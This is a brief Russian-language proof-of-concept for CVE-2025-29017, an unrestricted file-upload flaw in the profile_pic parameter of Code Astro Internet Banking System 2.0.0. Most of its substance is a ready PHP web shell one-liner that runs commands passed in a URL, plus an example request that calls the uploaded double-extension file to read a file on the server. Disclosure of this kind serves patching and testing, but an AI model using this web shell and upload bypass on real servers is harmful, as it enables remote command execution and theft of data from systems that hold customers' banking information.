
Эксплойт proof-of-concept для CVE-2025-29017, демонстрирующий удалённое выполнение кода посредством загрузки вредоносного файла в Code Astro Internet Banking System 2.0.0.
Уязвимость удаленного выполнения кода (RCE) существует в Code Astro Internet Banking System 2.0.0 из-за некорректной проверки загрузки файлов в параметре profile_pic в pages_view_client.php. Злоумышленники могут обойти проверки безопасности, изменив запрос загрузки, что приводит к выполнению произвольного кода.
profile_pic в pages_view_client.php


<?php system($_GET['cmd']); ?>


http://IP:PORT/InternetBanking-php/admin/dist/img/image.jpeg.php?cmd=type C:\Users\file.txt
